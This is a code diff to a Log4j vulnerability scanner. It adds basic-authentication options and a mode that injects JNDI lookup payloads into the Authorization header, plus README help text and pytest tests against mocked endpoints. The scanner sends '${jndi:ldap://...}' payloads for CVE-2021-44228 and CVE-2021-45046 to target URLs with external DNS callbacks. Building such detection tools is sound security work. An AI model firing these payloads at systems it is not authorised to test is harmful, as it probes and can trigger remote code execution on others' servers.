diff --git a/README.md b/README.md index 17bfcdd..364ce7d 100644 --- a/README.md +++ b/README.md @@ -40,6 +40,7 @@ $ python3 log4j-scan.py -h [•] Secure your External Attack Surface with FullHunt.io. usage: log4j-scan.py [-h] [-u URL] [-l USEDLIST] [--request-type REQUEST_TYPE] [--headers-file HEADERS_FILE] [--run-all-tests] [--exclude-user-agent-fuzzing] [--wait-time WAIT_TIME] [--waf-bypass] [--dns-callback-provider DNS_CALLBACK_PROVIDER] [--custom-dns-callback-host CUSTOM_DNS_CALLBACK_HOST] + [--basic-auth-user USER] [--basic-auth-password PASSWORD] [--authorization-injection INJECTION_TYPE] [--disable-http-redirects] optional arguments: -h, --help show this help message and exit @@ -65,6 +66,12 @@ optional arguments: DNS Callback provider (Options: dnslog.cn, interact.sh) - [Default: interact.sh]. --custom-dns-callback-host CUSTOM_DNS_CALLBACK_HOST Custom DNS Callback Host. + --basic-auth-user USER + Preemptive basic authentication user. + --basic-auth-password PASSWORD + Preemptive basic authentication password. + --authorization-injection INJECTION_TYPE + Authorization injection type: (basic) - [Default: none]. --disable-http-redirects Disable HTTP redirects. Note: HTTP redirects are useful as it allows the payloads to have higher chance of reaching vulnerable systems. ``` diff --git a/log4j-scan.py b/log4j-scan.py index f8ed3da..9a3ddfd 100755 --- a/log4j-scan.py +++ b/log4j-scan.py @@ -23,6 +23,7 @@ from Crypto.PublicKey import RSA from Crypto.Hash import SHA256 from termcolor import cprint +from requests.auth import HTTPBasicAuth # Disable SSL warnings try: @@ -111,15 +112,28 @@ def parse_args(args_input): dest="custom_dns_callback_host", help="Custom DNS Callback Host.", action='store') + parser.add_argument("--basic-auth-user", + dest="basic_auth_user", + help="Preemptive basic authentication user.", + action='store') + parser.add_argument("--basic-auth-password", + dest="basic_auth_password", + help="Preemptive basic authentication password.", + action='store') + parser.add_argument("--authorization-injection", + dest="authorization_injection_type", + help="Authorization injection type: (basic) - [Default: none].", + default="none", + action='store') parser.add_argument("--disable-http-redirects", dest="disable_redirects", help="Disable HTTP redirects. Note: HTTP redirects are useful as it allows the payloads to have higher chance of reaching vulnerable systems.", - action='store_true') + action='store_true') return parser.parse_args(args_input) -def get_fuzzing_headers(payload, headers_file, exclude_user_agent_fuzzing): +def get_fuzzing_headers(payload, headers_file, exclude_user_agent_fuzzing, authorization_injection_type): fuzzing_headers = {} fuzzing_headers.update(default_headers) with open(headers_file, "r") as f: @@ -130,6 +144,8 @@ def get_fuzzing_headers(payload, headers_file, exclude_user_agent_fuzzing): fuzzing_headers.update({i: payload}) if exclude_user_agent_fuzzing: fuzzing_headers["User-Agent"] = default_headers["User-Agent"] + if authorization_injection_type == 'basic': + fuzzing_headers["Authorization"] = 'Basic %s' % base64.b64encode((payload + ':fakepassword').encode('utf-8')).decode() fuzzing_headers["Referer"] = f'https://{fuzzing_headers["Referer"]}' return fuzzing_headers @@ -279,14 +295,19 @@ def scan_url(url, callback_host, proxies, args): cprint(f"[•] Scanning for CVE-2021-45046 (Log4j v2.15.0 Patch Bypass - RCE)", "yellow") payloads = get_cve_2021_45046_payloads(f'{parsed_url["host"]}.{callback_host}', random_string) + auth = None + if args.basic_auth_user: + auth = HTTPBasicAuth(args.basic_auth_user, args.basic_auth_password) + for payload in payloads: cprint(f"[•] URL: {url} | PAYLOAD: {payload}", "cyan") if args.request_type.upper() == "GET" or args.run_all_tests: try: requests.request(url=url, method="GET", + auth=auth, params={"v": payload}, - headers=get_fuzzing_headers(payload, args.headers_file, args.exclude_user_agent_fuzzing), + headers=get_fuzzing_headers(payload, args.headers_file, args.exclude_user_agent_fuzzing, args.authorization_injection_type), verify=False, timeout=timeout, allow_redirects=(not args.disable_redirects), @@ -299,8 +320,9 @@ def scan_url(url, callback_host, proxies, args): # Post body requests.request(url=url, method="POST", + auth=auth, params={"v": payload}, - headers=get_fuzzing_headers(payload, args.headers_file, args.exclude_user_agent_fuzzing), + headers=get_fuzzing_headers(payload, args.headers_file, args.exclude_user_agent_fuzzing, args.authorization_injection_type), data=get_fuzzing_post_data(payload), verify=False, timeout=timeout, @@ -313,8 +335,9 @@ def scan_url(url, callback_host, proxies, args): # JSON body requests.request(url=url, method="POST", + auth=auth, params={"v": payload}, - headers=get_fuzzing_headers(payload, args.headers_file, args.exclude_user_agent_fuzzing), + headers=get_fuzzing_headers(payload, args.headers_file, args.exclude_user_agent_fuzzing, args.authorization_injection_type), json=get_fuzzing_post_data(payload), verify=False, timeout=timeout, @@ -347,6 +370,12 @@ def main(options): continue urls.append(i) + if args.basic_auth_user: + cprint(f"[•] Using preemptive basic authentication with user [{args.basic_auth_user}].") + if not args.basic_auth_password: + raise ValueError("'--basic-auth-password' is mandatory when basic authentication user is defined.") + if args.authorization_injection_type != 'none': + raise ValueError("'--authorization-injection' is not compatible when basic authentication is defined.") dns_callback_host = "" if args.custom_dns_callback_host: cprint(f"[•] Using custom DNS Callback host [{args.custom_dns_callback_host}]. No verification will be done after sending fuzz requests.") diff --git a/tests/test_log4j_scan.py b/tests/test_log4j_scan.py index 8d82704..b8580d7 100644 --- a/tests/test_log4j_scan.py +++ b/tests/test_log4j_scan.py @@ -1,7 +1,13 @@ import re -import importlib +import base64 +import pytest +import requests_mock +import importlib log4j_scan = importlib.import_module("log4j-scan", package='..') +LOCALHOST = 'https://localhost/' +DNS_CUSTOM = 'custom.dns.callback' + def test_args_required(capsys): log4j_scan.main([]) @@ -12,9 +18,9 @@ def test_args_required(capsys): def test_default(requests_mock, capsys): adapter_dns_register = requests_mock.post('https://interact.sh/register', text='success') adapter_dns_save = requests_mock.get('https://interact.sh/poll', json={'data': [], 'extra': None, 'aes_key': 'FAKE'}) - adapter_endpoint = requests_mock.get('https://localhost/') + adapter_endpoint = requests_mock.get(LOCALHOST) - log4j_scan.main(['-u', 'https://localhost/']) + log4j_scan.main(['-u', LOCALHOST]) captured = capsys.readouterr() @@ -25,4 +31,51 @@ def test_default(requests_mock, capsys): assert 'Targets does not seem to be vulnerable' in captured.out assert 'jndi' in adapter_endpoint.last_request.url assert re.match(r'\${jndi:ldap://localhost\..*.interact\.sh/.*}', adapter_endpoint.last_request.headers['User-Agent']) + assert 'Authorization' not in adapter_endpoint.last_request.headers + + +def test_custom_dns_callback_host(requests_mock): + adapter_endpoint = requests_mock.get(LOCALHOST) + + log4j_scan.main(['-u', LOCALHOST, '--custom-dns-callback-host', DNS_CUSTOM ]) + + assert adapter_endpoint.call_count == 1 + assert re.match(r'\${jndi:ldap://localhost\.custom.dns.callback/.*}', adapter_endpoint.last_request.headers['User-Agent']) + + +def test_authentication_basic_no_password(): + with pytest.raises(Exception) as ex: + log4j_scan.main(['-u', LOCALHOST, '--custom-dns-callback-host', DNS_CUSTOM, '--basic-auth-user', 'foo' ]) + assert "'--basic-auth-password' is mandatory when basic authentication user is defined." == str(ex.value) + + +def test_authentication_basic(requests_mock): + adapter_endpoint_get = requests_mock.get(LOCALHOST) + adapter_endpoint_post = requests_mock.post(LOCALHOST) + + log4j_scan.main(['-u', LOCALHOST, '--custom-dns-callback-host', DNS_CUSTOM, '--basic-auth-user', 'foo', '--basic-auth-password', 'bar', '--run-all-tests']) + + assert adapter_endpoint_get.call_count == 1 + assert adapter_endpoint_post.call_count == 2 + + _basic_auth_encoded = 'Basic Zm9vOmJhcg==' + assert _basic_auth_encoded == adapter_endpoint_get.last_request.headers['Authorization'] + assert _basic_auth_encoded == adapter_endpoint_post.request_history[0].headers['Authorization'] + assert _basic_auth_encoded == adapter_endpoint_post.request_history[1].headers['Authorization'] + + +def test_authentication_injection_basic_with_user(): + with pytest.raises(Exception) as ex: + log4j_scan.main(['-u', LOCALHOST, '--custom-dns-callback-host', DNS_CUSTOM, '--authorization-injection', 'basic', '--basic-auth-user', 'foo', '--basic-auth-password', 'bar' ]) + assert "'--authorization-injection' is not compatible when basic authentication is defined." == str(ex.value) + + +def test_authentication_injection_basic(requests_mock): + adapter_endpoint = requests_mock.get(LOCALHOST) + + log4j_scan.main(['-u', LOCALHOST, '--custom-dns-callback-host', DNS_CUSTOM, '--authorization-injection', 'basic']) + + assert adapter_endpoint.call_count == 1 + _basic_auth = 'Basic %s' % base64.b64encode((adapter_endpoint.last_request.headers['User-Agent'] + ':fakepassword').encode('utf-8')).decode() + assert _basic_auth == adapter_endpoint.last_request.headers['Authorization']